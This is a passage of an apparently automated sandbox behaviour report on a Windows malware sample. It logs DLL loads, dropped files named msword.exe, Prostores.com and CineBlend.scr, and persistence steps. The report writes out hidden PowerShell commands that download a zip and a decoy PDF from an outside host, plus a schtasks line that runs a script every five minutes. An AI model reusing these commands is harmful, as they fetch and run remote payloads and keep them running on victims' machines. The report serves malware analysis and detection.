Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wldp.dll

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

15_2_00406328

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00B60DE6 push ecx; ret

33_2_00B60DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	File created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	File created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BD26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		33_2_00BD26DD
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B5FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		33_2_00B5FC7C

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
